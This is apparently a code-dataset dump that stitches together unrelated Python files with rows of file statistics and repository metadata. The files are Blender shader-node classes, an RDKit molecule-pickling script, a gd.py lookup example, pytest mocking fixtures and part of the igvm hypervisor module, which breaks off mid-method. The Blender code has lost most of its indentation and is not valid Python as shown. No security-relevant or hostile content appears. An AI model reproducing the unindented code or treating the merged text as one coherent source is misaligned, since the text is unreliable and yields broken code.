self.links.new(self.inputs.outputs["Color"], trans.inputs["Color"])
self.links.new(self.inputs.outputs["Normal"], trans.inputs["Normal"])
gamma = self.addNode("ShaderNodeGamma", 1)
self.links.new(self.inputs.outputs["Color"], gamma.inputs["Color"])
gamma.inputs["Gamma"].default_value = 2.5
sss = self.addNode("ShaderNodeSubsurfaceScattering", 1)
self.links.new(gamma.outputs["Color"], sss.inputs["Color"])
self.links.new(self.inputs.outputs["Scale"], sss.inputs["Scale"])
self.links.new(self.inputs.outputs["Radius"], sss.inputs["Radius"])
self.links.new(self.inputs.outputs["Normal"], sss.inputs["Normal"])
self.links.new(trans.outputs[0], self.mix1.inputs[2])
self.links.new(sss.outputs[0], self.mix2.inputs[2])
# ---------------------------------------------------------------------
# SSS Group
# ---------------------------------------------------------------------
class SSSGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
self.group.inputs.new("NodeSocketFloat", "Scale")
self.group.inputs.new("NodeSocketVector", "Radius")
self.group.inputs.new("NodeSocketVector", "Normal")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
sss = self.addNode("ShaderNodeSubsurfaceScattering", 1)
self.links.new(self.inputs.outputs["Color"], sss.inputs["Color"])
self.links.new(self.inputs.outputs["Scale"], sss.inputs["Scale"])
self.links.new(self.inputs.outputs["Radius"], sss.inputs["Radius"])
self.links.new(self.inputs.outputs["Normal"], sss.inputs["Normal"])
self.links.new(sss.outputs[0], self.mix1.inputs[2])
self.links.new(sss.outputs[0], self.mix2.inputs[2])
# ---------------------------------------------------------------------
# Dual Lobe Group
# ---------------------------------------------------------------------
class DualLobeGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 4)
self.group.inputs.new("NodeSocketFloat", "Fac")
self.group.inputs.new("NodeSocketShader", "Cycles")
self.group.inputs.new("NodeSocketShader", "Eevee")
self.group.inputs.new("NodeSocketFloat", "Weight")
self.group.inputs.new("NodeSocketFloat", "IOR")
self.group.inputs.new("NodeSocketFloat", "Roughness 1")
self.group.inputs.new("NodeSocketFloat", "Roughness 2")
self.group.inputs.new("NodeSocketVector", "Normal")
self.group.outputs.new("NodeSocketShader", "Cycles")
self.group.outputs.new("NodeSocketShader", "Eevee")
def addNodes(self, args=None):
fresnel1 = self.addFresnel(True)
glossy1 = self.addGlossy("Roughness 1", True)
cycles1 = self.mixGlossy(fresnel1, glossy1, "Cycles")
eevee1 = self.mixGlossy(fresnel1, glossy1, "Eevee")
fresnel2 = self.addFresnel(False)
glossy2 = self.addGlossy("Roughness 2", False)
cycles2 = self.mixGlossy(fresnel2, glossy2, "Cycles")
eevee2 = self.mixGlossy(fresnel2, glossy2, "Eevee")
self.mixOutput(cycles1, cycles2, "Cycles")
self.mixOutput(eevee1, eevee2, "Eevee")
def addFresnel(self, useNormal):
fresnel = self.addNode("ShaderNodeFresnel", 1)
self.links.new(self.inputs.outputs["IOR"], fresnel.inputs["IOR"])
if useNormal:
self.links.new(self.inputs.outputs["Normal"], fresnel.inputs["Normal"])
return fresnel
def addGlossy(self, roughness, useNormal):
glossy = self.addNode("ShaderNodeBsdfGlossy", 1)
self.links.new(self.inputs.outputs["Weight"], glossy.inputs["Color"])
self.links.new(self.inputs.outputs[roughness], glossy.inputs["Roughness"])
if useNormal:
self.links.new(self.inputs.outputs["Normal"], glossy.inputs["Normal"])
return glossy
def mixGlossy(self, fresnel, glossy, slot):
mix = self.addNode("ShaderNodeMixShader", 2)
self.links.new(fresnel.outputs[0], mix.inputs[0])
self.links.new(self.inputs.outputs[slot], mix.inputs[1])
self.links.new(glossy.outputs[0], mix.inputs[2])
return mix
def mixOutput(self, node1, node2, slot):
mix = self.addNode("ShaderNodeMixShader", 3)
self.links.new(self.inputs.outputs["Fac"], mix.inputs[0])
self.links.new(node1.outputs[0], mix.inputs[2])
self.links.new(node2.outputs[0], mix.inputs[1])
self.links.new(mix.outputs[0], self.outputs.inputs[slot])
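        # (Added note) With Fac driving input 0, node2 in input 1 and node1
        # in input 2, the effective blend is (1 - Fac) * lobe2 + Fac * lobe1,
        # i.e. Fac weights the first specular lobe.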
# ---------------------------------------------------------------------
# Volume Group
# ---------------------------------------------------------------------
class VolumeGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Absorbtion Color")
self.group.inputs.new("NodeSocketFloat", "Absorbtion Density")
self.group.inputs.new("NodeSocketColor", "Scatter Color")
self.group.inputs.new("NodeSocketFloat", "Scatter Density")
self.group.inputs.new("NodeSocketFloat", "Scatter Anisotropy")
self.group.outputs.new("NodeSocketShader", "Volume")
def addNodes(self, args=None):
absorb = self.addNode("ShaderNodeVolumeAbsorption", 1)
self.links.new(self.inputs.outputs["Absorbtion Color"], absorb.inputs["Color"])
self.links.new(self.inputs.outputs["Absorbtion Density"], absorb.inputs["Density"])
scatter = self.addNode("ShaderNodeVolumeScatter", 1)
self.links.new(self.inputs.outputs["Scatter Color"], scatter.inputs["Color"])
self.links.new(self.inputs.outputs["Scatter Density"], scatter.inputs["Density"])
self.links.new(self.inputs.outputs["Scatter Anisotropy"], scatter.inputs["Anisotropy"])
volume = self.addNode("ShaderNodeAddShader", 2)
self.links.new(absorb.outputs[0], volume.inputs[0])
self.links.new(scatter.outputs[0], volume.inputs[1])
self.links.new(volume.outputs[0], self.outputs.inputs["Volume"])
# ---------------------------------------------------------------------
# Normal Group
#
# https://blenderartists.org/t/way-faster-normal-map-node-for-realtime-animation-playback-with-tangent-space-normals/1175379
# ---------------------------------------------------------------------
class NormalGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 8)
strength = self.group.inputs.new("NodeSocketFloat", "Strength")
strength.default_value = 1.0
strength.min_value = 0.0
strength.max_value = 1.0
color = self.group.inputs.new("NodeSocketColor", "Color")
color.default_value = ((0.5, 0.5, 1.0, 1.0))
self.group.outputs.new("NodeSocketVector", "Normal")
def addNodes(self, args):
# Generate TBN from Bump Node
frame = self.nodes.new("NodeFrame")
frame.label = "Generate TBN from Bump Node"
uvmap = self.addNode("ShaderNodeUVMap", 1, parent=frame)
if args[0]:
uvmap.uv_map = args[0]
uvgrads = self.addNode("ShaderNodeSeparateXYZ", 2, label="UV Gradients", parent=frame)
self.links.new(uvmap.outputs["UV"], uvgrads.inputs[0])
tangent = self.addNode("ShaderNodeBump", 3, label="Tangent", parent=frame)
tangent.invert = True
tangent.inputs["Distance"].default_value = 1
self.links.new(uvgrads.outputs[0], tangent.inputs["Height"])
bitangent = self.addNode("ShaderNodeBump", 3, label="Bi-Tangent", parent=frame)
bitangent.invert = True
bitangent.inputs["Distance"].default_value = 1000
self.links.new(uvgrads.outputs[1], bitangent.inputs["Height"])
geo = self.addNode("ShaderNodeNewGeometry", 3, label="Normal", parent=frame)
# Transpose Matrix
frame = self.nodes.new("NodeFrame")
frame.label = "Transpose Matrix"
sep1 = self.addNode("ShaderNodeSeparateXYZ", 4, parent=frame)
self.links.new(tangent.outputs["Normal"], sep1.inputs[0])
sep2 = self.addNode("ShaderNodeSeparateXYZ", 4, parent=frame)
self.links.new(bitangent.outputs["Normal"], sep2.inputs[0])
sep3 = self.addNode("ShaderNodeSeparateXYZ", 4, parent=frame)
self.links.new(geo.outputs["Normal"], sep3.inputs[0])
comb1 = self.addNode("ShaderNodeCombineXYZ", 5, parent=frame)
self.links.new(sep1.outputs[0], comb1.inputs[0])
self.links.new(sep2.outputs[0], comb1.inputs[1])
self.links.new(sep3.outputs[0], comb1.inputs[2])
comb2 = self.addNode("ShaderNodeCombineXYZ", 5, parent=frame)
self.links.new(sep1.outputs[1], comb2.inputs[0])
self.links.new(sep2.outputs[1], comb2.inputs[1])
self.links.new(sep3.outputs[1], comb2.inputs[2])
comb3 = self.addNode("ShaderNodeCombineXYZ", 5, parent=frame)
self.links.new(sep1.outputs[2], comb3.inputs[0])
self.links.new(sep2.outputs[2], comb3.inputs[1])
self.links.new(sep3.outputs[2], comb3.inputs[2])
# Normal Map Processing
frame = self.nodes.new("NodeFrame")
frame.label = "Normal Map Processing"
rgb = self.addNode("ShaderNodeMixRGB", 3, parent=frame)
self.links.new(self.inputs.outputs["Strength"], rgb.inputs[0])
rgb.inputs[1].default_value = (0.5, 0.5, 1.0, 1.0)
self.links.new(self.inputs.outputs["Color"], rgb.inputs[2])
sub = self.addNode("ShaderNodeVectorMath", 4, parent=frame)
sub.operation = 'SUBTRACT'
self.links.new(rgb.outputs["Color"], sub.inputs[0])
sub.inputs[1].default_value = (0.5, 0.5, 0.5)
add = self.addNode("ShaderNodeVectorMath", 5, parent=frame)
add.operation = 'ADD'
self.links.new(sub.outputs[0], add.inputs[0])
self.links.new(sub.outputs[0], add.inputs[1])
# Matrix * Normal Map
frame = self.nodes.new("NodeFrame")
frame.label = "Matrix * Normal Map"
dot1 = self.addNode("ShaderNodeVectorMath", 6, parent=frame)
dot1.operation = 'DOT_PRODUCT'
self.links.new(comb1.outputs[0], dot1.inputs[0])
self.links.new(add.outputs[0], dot1.inputs[1])
dot2 = self.addNode("ShaderNodeVectorMath", 6, parent=frame)
dot2.operation = 'DOT_PRODUCT'
self.links.new(comb2.outputs[0], dot2.inputs[0])
self.links.new(add.outputs[0], dot2.inputs[1])
dot3 = self.addNode("ShaderNodeVectorMath", 6, parent=frame)
dot3.operation = 'DOT_PRODUCT'
self.links.new(comb3.outputs[0], dot3.inputs[0])
self.links.new(add.outputs[0], dot3.inputs[1])
comb = self.addNode("ShaderNodeCombineXYZ", 7, parent=frame)
self.links.new(dot1.outputs["Value"], comb.inputs[0])
self.links.new(dot2.outputs["Value"], comb.inputs[1])
self.links.new(dot3.outputs["Value"], comb.inputs[2])
self.links.new(comb.outputs[0], self.outputs.inputs["Normal"])
# ---------------------------------------------------------------------
# Displacement Group
# ---------------------------------------------------------------------
class DisplacementGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 4)
self.group.inputs.new("NodeSocketFloat", "Texture")
self.group.inputs.new("NodeSocketFloat", "Strength")
self.group.inputs.new("NodeSocketFloat", "Difference")
self.group.inputs.new("NodeSocketFloat", "Min")
self.group.outputs.new("NodeSocketFloat", "Height")
def addNodes(self, args=None):
mult1 = self.addNode("ShaderNodeMath", 1)
mult1.operation = 'MULTIPLY'
self.links.new(self.inputs.outputs["Texture"], mult1.inputs[0])
self.links.new(self.inputs.outputs["Difference"], mult1.inputs[1])
add = self.addNode("ShaderNodeMath", 2)
add.operation = 'ADD'
self.links.new(mult1.outputs[0], add.inputs[0])
self.links.new(self.inputs.outputs["Min"], add.inputs[1])
mult2 = self.addNode("ShaderNodeMath", 3)
mult2.operation = 'MULTIPLY'
self.links.new(self.inputs.outputs["Strength"], mult2.inputs[0])
self.links.new(add.outputs[0], mult2.inputs[1])
self.links.new(mult2.outputs[0], self.outputs.inputs["Height"])
# ---------------------------------------------------------------------
# LIE Group
# ---------------------------------------------------------------------
class LieGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 6)
self.group.inputs.new("NodeSocketVector", "Vector")
self.texco = self.inputs.outputs[0]
self.group.inputs.new("NodeSocketFloat", "Alpha")
self.group.outputs.new("NodeSocketColor", "Color")
def addTextureNodes(self, assets, maps, colorSpace):
texnodes = []
for idx,asset in enumerate(assets):
texnode,isnew = self.addSingleTexture(3, asset, maps[idx], colorSpace)
if isnew:
innode = texnode
mapping = self.mapTexture(asset, maps[idx])
if mapping:
texnode.extension = 'CLIP'
self.links.new(mapping.outputs["Vector"], texnode.inputs["Vector"])
innode = mapping
else:
self.setTexNode(asset.images[colorSpace].name, texnode, colorSpace)
self.links.new(self.inputs.outputs["Vector"], innode.inputs["Vector"])
texnodes.append([texnode])
if texnodes:
nassets = len(assets)
for idx in range(1, nassets):
map = maps[idx]
if map.invert:
inv = self.addNode("ShaderNodeInvert", 4)
node = texnodes[idx][0]
self.links.new(node.outputs[0], inv.inputs["Color"])
texnodes[idx].append(inv)
texnode = texnodes[0][-1]
alphamix = self.addNode("ShaderNodeMixRGB", 6)
alphamix.blend_type = 'MIX'
alphamix.inputs[0].default_value = 1.0
self.links.new(self.inputs.outputs["Alpha"], alphamix.inputs[0])
self.links.new(texnode.outputs["Color"], alphamix.inputs[1])
masked = False
for idx in range(1, nassets):
map = maps[idx]
if map.ismask:
if idx == nassets-1:
continue
mix = self.addNode("ShaderNodeMixRGB", 5) # ShaderNodeMixRGB
mix.blend_type = 'MULTIPLY'
mix.use_alpha = False
mask = texnodes[idx][-1]
self.setColorSpace(mask, 'NONE')
self.links.new(mask.outputs["Color"], mix.inputs[0])
self.links.new(texnode.outputs["Color"], mix.inputs[1])
self.links.new(texnodes[idx+1][-1].outputs["Color"], mix.inputs[2])
texnode = mix
masked = True
elif not masked:
mix = self.addNode("ShaderNodeMixRGB", 5)
alpha = setMixOperation(mix, map)
mix.inputs[0].default_value = alpha
node = texnodes[idx][-1]
base = texnodes[idx][0]
if alpha != 1:
node = self.multiplyScalarTex(alpha, base, 4, "Alpha")
self.links.new(node.outputs[0], mix.inputs[0])
elif "Alpha" in base.outputs.keys():
self.links.new(base.outputs["Alpha"], mix.inputs[0])
else:
print("No LIE alpha:", base)
mix.inputs[0].default_value = alpha
mix.use_alpha = True
self.links.new(texnode.outputs["Color"], mix.inputs[1])
self.links.new(texnodes[idx][-1].outputs["Color"], mix.inputs[2])
texnode = mix
masked = False
else:
masked = False
self.links.new(texnode.outputs[0], alphamix.inputs[2])
self.links.new(alphamix.outputs[0], self.outputs.inputs["Color"])
def mapTexture(self, asset, map):
if asset.hasMapping(map):
data = asset.getMapping(self.material, map)
return self.addMappingNode(data, map)
def setMixOperation(mix, map):
    op = map.operation
    alpha = map.transparency
    if op == "multiply":
        mix.blend_type = 'MULTIPLY'
        useAlpha = True
    elif op == "add":
        mix.blend_type = 'ADD'
        useAlpha = False
    elif op == "subtract":
        mix.blend_type = 'SUBTRACT'
        useAlpha = False
    elif op == "alpha_blend":
        mix.blend_type = 'MIX'
        useAlpha = True
    else:
        # "asset" was referenced here but is undefined in this scope;
        # only report the unsupported operation.
        print("MIX", map.operation)
    # Note: useAlpha is assigned but never used.
    return alpha
| 43.742744 | 126 | 0.594626 | 3,675 | 33,157 | 5.307755 | 0.106395 | 0.070132 | 0.092894 | 0.054957 | 0.647698 | 0.574541 | 0.505383 | 0.440121 | 0.36558 | 0.331744 | 0 | 0.016745 | 0.19851 | 33,157 | 757 | 127 | 43.800528 | 0.717253 | 0.134089 | 0 | 0.32948 | 0 | 0 | 0.14683 | 0.013939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088632 | false | 0 | 0.007707 | 0.001927 | 0.148362 | 0.003854 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f863b4274290ea62902a6d00d749f166e4d688 | 847 | py | Python | CSD_sdf_to_p.py | Snigdha-Agarwal/dl4chem-geometry | 6b025ad27a63c814d07c7c30118587236388d61d | [
"BSD-3-Clause"
] | 59 | 2019-04-01T00:40:59.000Z | 2021-08-28T05:34:26.000Z | CSD_sdf_to_p.py | Snigdha-Agarwal/dl4chem-geometry | 6b025ad27a63c814d07c7c30118587236388d61d | [
"BSD-3-Clause"
] | 2 | 2019-07-08T01:49:37.000Z | 2019-11-09T21:30:19.000Z | CSD_sdf_to_p.py | Snigdha-Agarwal/dl4chem-geometry | 6b025ad27a63c814d07c7c30118587236388d61d | [
"BSD-3-Clause"
] | 16 | 2019-04-01T03:05:54.000Z | 2021-08-23T13:56:46.000Z | import numpy as np
import pickle
from rdkit import Chem
n_min = 2
n_max = 50
smilist, mollist = [], []
suppl = Chem.SDMolSupplier('CSD.sdf')
j = 0
k = 0
for i, mol in enumerate(suppl):
try:
Chem.rdmolops.AssignAtomChiralTagsFromStructure(mol)
Chem.rdmolops.AssignStereochemistry(mol)
smiles = Chem.MolToSmiles(mol, isomericSmiles=True)
na = mol.GetNumHeavyAtoms()
pos = mol.GetConformer().GetPositions()
if na==pos.shape[0] and na>=n_min and na<=n_max:
smilist.append(smiles)
mollist.append(mol)
j += 1
k += 1
    except Exception:
continue
print('j = {}'.format(j))
print('k = {}'.format(k))
print('i = {}'.format(i))
smilist=np.array(smilist)
mollist=np.array(mollist)
with open('CSD_molset_all.p','wb') as f:
pickle.dump([mollist, smilist], f)
| 25.666667 | 60 | 0.623377 | 114 | 847 | 4.578947 | 0.508772 | 0.015326 | 0.022989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012289 | 0.231405 | 847 | 32 | 61 | 26.46875 | 0.789555 | 0 | 0 | 0 | 0 | 0 | 0.050767 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f8b882a8802eba9c921df2a8d47a816b7b3760 | 856 | py | Python | examples/get_id.py | scottwedge/gd.py | 328c9833abc949b1c9ac0eabe276bd66fead4c2c | [
"MIT"
] | null | null | null | examples/get_id.py | scottwedge/gd.py | 328c9833abc949b1c9ac0eabe276bd66fead4c2c | [
"MIT"
] | null | null | null | examples/get_id.py | scottwedge/gd.py | 328c9833abc949b1c9ac0eabe276bd66fead4c2c | [
"MIT"
] | null | null | null | """Simple example showing user searching.
Author: NeKitDS
"""
import asyncio
import gd
client = gd.Client()
async def main():
# get some input from user
name = input("Enter your GD nickname: ")
# look up and print IDs if found
try:
user = await client.find_user(name)
if not user.is_registered():
print(f"Hey there, {user.name}! Seems like you are unregistered...".format(user))
else:
print(
f"Hello, {user.name}! Your AccountID is {user.account_id} "
f"and PlayerID is {user.id}."
)
# could not find
except gd.MissingAccess:
print(f"Sorry, could not find user with name {name}...")
# let us wait a bit before exiting
await asyncio.sleep(3)
# run a program
client.run(main())
| 22.526316 | 94 | 0.571262 | 111 | 856 | 4.378378 | 0.594595 | 0.065844 | 0.049383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00173 | 0.324766 | 856 | 37 | 95 | 23.135135 | 0.8391 | 0.202103 | 0 | 0 | 0 | 0 | 0.330709 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f9824cbd16d97852ba84f6a02c0f9fcb8e78c9 | 1,440 | py | Python | tests/kubectl/conftest.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | 2 | 2021-05-14T22:00:55.000Z | 2021-09-17T20:09:17.000Z | tests/kubectl/conftest.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | null | null | null | tests/kubectl/conftest.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | 1 | 2021-07-16T08:35:43.000Z | 2021-07-16T08:35:43.000Z | from unittest.mock import MagicMock, patch
import pytest
from klander_core.kubectl import _build_cmd as original_build_cmd
@pytest.fixture
def mock_fake_proc(request):
fake_proc = MagicMock()
marker = request.node.get_closest_marker('proc_exit_code')
if marker is None:
fake_proc.wait.return_value = 0
else:
fake_proc.wait.return_value = marker.args[0]
yield fake_proc
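# Usage sketch (hypothetical, not part of this suite): a test decorated with
# @pytest.mark.proc_exit_code(1) makes the fake process's wait() return 1;
# without the marker it returns 0.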
@pytest.fixture
def mock_popen(mock_fake_proc):
with patch('klander_core.kubectl.subprocess.Popen') as MockPopen:
MockPopen.return_value = mock_fake_proc
yield MockPopen
@pytest.fixture
def mock_fake_file(request):
fake_file = MagicMock()
marker = request.node.get_closest_marker('proc_output')
if marker is None:
fake_file.read.return_value = 'hello world'.encode('utf-8')
else:
fake_file.read.return_value = marker.args[0].encode('utf-8')
yield fake_file
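# Usage sketch (hypothetical): @pytest.mark.proc_output('some text') controls
# what the fake temporary file's read() returns; the default is
# b'hello world'.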
@pytest.fixture
def mock_tempfile(mock_fake_file):
with patch('klander_core.kubectl.tempfile.TemporaryFile') as MockTempFile:
context_manager = MagicMock()
context_manager.__enter__.return_value = mock_fake_file
MockTempFile.return_value = context_manager
yield MockTempFile
@pytest.fixture
def mock_build_cmd():
with patch('klander_core.kubectl._build_cmd') as fake_build_cmd:
fake_build_cmd.side_effect = original_build_cmd
yield fake_build_cmd
| 24.827586 | 78 | 0.731944 | 196 | 1,440 | 5.05102 | 0.280612 | 0.064646 | 0.080808 | 0.10101 | 0.366667 | 0.092929 | 0.092929 | 0.092929 | 0 | 0 | 0 | 0.004263 | 0.185417 | 1,440 | 57 | 79 | 25.263158 | 0.839727 | 0 | 0 | 0.236842 | 0 | 0 | 0.109028 | 0.077083 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131579 | false | 0 | 0.078947 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7fe4fbd79fd0b47bea77dc1c37e6c656c380244 | 42,556 | py | Python | igvm/hypervisor.py | innogames/igvm | 6c4bd98d61ebaf6280698e74d560ea5b3d70cd9e | [
"MIT"
] | 14 | 2018-02-15T14:09:54.000Z | 2021-07-19T01:55:58.000Z | igvm/hypervisor.py | innogames/igvm | 6c4bd98d61ebaf6280698e74d560ea5b3d70cd9e | [
"MIT"
] | 129 | 2018-02-19T09:47:18.000Z | 2022-03-02T14:08:10.000Z | igvm/hypervisor.py | innogames/igvm | 6c4bd98d61ebaf6280698e74d560ea5b3d70cd9e | [
"MIT"
] | 10 | 2018-02-16T15:56:59.000Z | 2021-05-14T23:31:31.000Z | """igvm - Hypervisor Model
Copyright (c) 2018 InnoGames GmbH
"""
import logging
import math
from contextlib import contextmanager
from time import sleep, time
from xml.etree import ElementTree
from igvm.vm import VM
from libvirt import VIR_DOMAIN_SHUTOFF
from igvm.drbd import DRBD
from igvm.exceptions import (
ConfigError,
HypervisorError,
InconsistentAttributeError,
InvalidStateError,
RemoteCommandError,
StorageError,
XfsMigrationError,
)
from igvm.host import Host
from igvm.kvm import (
DomainProperties,
generate_domain_xml,
migrate_live,
set_memory,
set_vcpus,
)
from igvm.libvirt import get_virtconn
from igvm.settings import (
HOST_RESERVED_MEMORY_MIB,
IGVM_IMAGE_MD5_URL,
IGVM_IMAGE_URL,
IMAGE_PATH,
KVM_HWMODEL_TO_CPUMODEL,
MIGRATE_CONFIG,
RESERVED_DISK,
VG_NAME,
VM_OVERHEAD_MEMORY_MIB,
XFS_CONFIG,
)
from igvm.transaction import Transaction
from igvm.utils import retry_wait_backoff
from typing import Iterator, Tuple
log = logging.getLogger(__name__)
class Hypervisor(Host):
"""Hypervisor interface."""
servertype = 'hypervisor'
def __init__(self, dataset_obj):
super(Hypervisor, self).__init__(dataset_obj)
if dataset_obj['state'] == 'retired':
raise InvalidStateError(
'Hypervisor "{0}" is retired.'.format(self.fqdn)
)
self._mount_path = {}
self._storage_pool = None
self._storage_type = None
def get_storage_pool(self):
# Store per-VM path information
# We cannot store these in the VM object due to migrations.
if self._storage_pool:
return self._storage_pool
self._storage_pool = self.conn().storagePoolLookupByName(VG_NAME)
return self._storage_pool
def get_storage_type(self):
if self._storage_type:
return self._storage_type
self._storage_type = ElementTree.fromstring(
self.get_storage_pool().XMLDesc()
).attrib['type']
if (
self._storage_type not in HOST_RESERVED_MEMORY_MIB
or self._storage_type not in RESERVED_DISK
):
raise HypervisorError(
'Unsupported storage type {} on hypervisor {}'
.format(self._storage_type, self.dataset_obj['hostname'])
)
return self._storage_type
def get_volume_by_vm(self, vm):
"""Get logical volume information of a VM"""
for vol_name in self.get_storage_pool().listVolumes():
# Match the LV based on the object_id encoded within its name
if vm.match_uid_name(vol_name):
return self.get_storage_pool().storageVolLookupByName(vol_name)
raise StorageError(
'No existing storage volume found for VM "{}" on "{}".'
.format(vm.fqdn, self.fqdn)
)
def vm_lv_update_name(self, vm):
"""Update the VMs logical volumes name
While the object_id part of the lv name will always be the same, the
hostname can get out of date when it's updated on serveradmin. Calling
this method during vm_restart updates it if required.
Be aware: This can only be done when the VM is shut off and the
libvirt domains needs to be redefined afterwards.
"""
old_name = self.get_volume_by_vm(vm).name()
new_name = vm.uid_name
with self.fabric_settings():
if old_name != new_name:
self.run(
'lvrename {} {}'.format(
self.get_volume_by_vm(vm).path(),
vm.uid_name
)
)
self.get_storage_pool().refresh()
def vm_mount_path(self, vm):
"""Returns the mount path for a VM or raises HypervisorError if not
mounted."""
if vm not in self._mount_path:
raise HypervisorError(
'"{}" is not mounted on "{}".'
.format(vm.fqdn, self.fqdn)
)
return self._mount_path[vm]
def get_vlan_network(self, ip_addr):
"""Find the network for the VM
        We cannot use the VM's "route_network" attribute directly because
        its IP address might have been changed.
"""
for vlan_network in self.dataset_obj['vlan_networks']:
if ip_addr in vlan_network['intern_ip']:
return vlan_network
return None
def vm_max_memory(self, vm):
"""Calculates the max amount of memory in MiB the VM may receive."""
mem = vm.dataset_obj['memory']
if mem > 12 * 1024:
max_mem = mem + 10 * 1024
else:
max_mem = 16 * 1024
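        # e.g. a 4 GiB VM gets a 16 GiB ceiling, while a 20 GiB VM gets
        # 20 + 10 = 30 GiB (before the hypervisor cap below)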
# Never go higher than the hypervisor
max_mem = min(self.total_vm_memory(), max_mem)
return max_mem
def check_vm(self, vm, offline):
"""Check whether a VM can run on this hypervisor"""
# Cheap checks should always be executed first to save time
# and fail early. Same goes for checks that are more likely to fail.
# Immediately check whether HV is even supported.
if not offline:
            # Compatible OS?
os_pair = (vm.hypervisor.dataset_obj['os'], self.dataset_obj['os'])
if os_pair not in MIGRATE_CONFIG:
raise HypervisorError(
'{} to {} migration is not supported online.'
.format(*os_pair))
# Compatible CPU model?
hw_pair = (
vm.hypervisor.dataset_obj['hardware_model'],
self.dataset_obj['hardware_model'],
)
cpu_pair = [
arch
for arch, models in KVM_HWMODEL_TO_CPUMODEL.items()
for model in hw_pair
if model in models
]
if cpu_pair[0] != cpu_pair[1]:
raise HypervisorError(
'{} to {} migration is not supported online.'
.format(*hw_pair)
)
# HV in supported state?
if self.dataset_obj['state'] not in ['online', 'online_reserved']:
raise InvalidStateError(
'Hypervisor "{}" is not in online state ({}).'
.format(self.fqdn, self.dataset_obj['state'])
)
# Enough CPUs?
if vm.dataset_obj['num_cpu'] > self.dataset_obj['num_cpu']:
raise HypervisorError(
'Not enough CPUs. Destination Hypervisor has {0}, '
'but VM requires {1}.'
.format(self.dataset_obj['num_cpu'], vm.dataset_obj['num_cpu'])
)
# Proper VLAN?
if not self.get_vlan_network(vm.dataset_obj['intern_ip']):
raise HypervisorError(
'Hypervisor "{}" does not support route_network "{}".'
.format(self.fqdn, vm.route_network)
)
# Those checks below all require libvirt connection,
# so execute them last to avoid unnecessary overhead if possible.
# Enough memory?
free_mib = self.free_vm_memory()
if vm.dataset_obj['memory'] > free_mib:
raise HypervisorError(
'Not enough memory. '
'Destination Hypervisor has {:.2f} MiB but VM requires {} MiB '
.format(free_mib, vm.dataset_obj['memory'])
)
# Enough disk?
free_disk_space = self.get_free_disk_size_gib()
vm_disk_size = float(vm.dataset_obj['disk_size_gib'])
if vm_disk_size > free_disk_space:
raise HypervisorError(
'Not enough free space in VG {} to build VM while keeping'
' {} GiB reserved'
.format(VG_NAME, RESERVED_DISK[self.get_storage_type()])
)
# VM already defined? Least likely, if at all.
if self.vm_defined(vm):
raise HypervisorError(
'VM "{}" is already defined on "{}".'
.format(vm.fqdn, self.fqdn)
)
def define_vm(self, vm, transaction=None):
"""Creates a VM on the hypervisor."""
log.info('Defining "{}" on "{}"...'.format(vm.fqdn, self.fqdn))
self.conn().defineXML(generate_domain_xml(self, vm))
# Refresh storage pools to register the vm image
for pool_name in self.conn().listStoragePools():
pool = self.conn().storagePoolLookupByName(pool_name)
pool.refresh(0)
if transaction:
transaction.on_rollback(
'delete VM', self.undefine_vm, vm, keep_storage=True
)
def _check_committed(self, vm):
"""Check that the given VM has no uncommitted changes"""
if vm.dataset_obj.is_dirty():
raise ConfigError(
'VM object has uncommitted changes, commit them first!'
)
def _check_attribute_synced(self, vm, attrib):
"""Compare an attribute value in Serveradmin with the actual value on
the hypervisor
"""
synced_values = self.vm_sync_from_hypervisor(vm)
if attrib not in synced_values:
log.warning('Cannot validate attribute "{}"!'.format(attrib))
return
current_value = synced_values[attrib]
if current_value != vm.dataset_obj[attrib]:
raise InconsistentAttributeError(vm, attrib, current_value)
def vm_set_num_cpu(self, vm, num_cpu):
"""Change the number of CPUs of a VM"""
self._check_committed(vm)
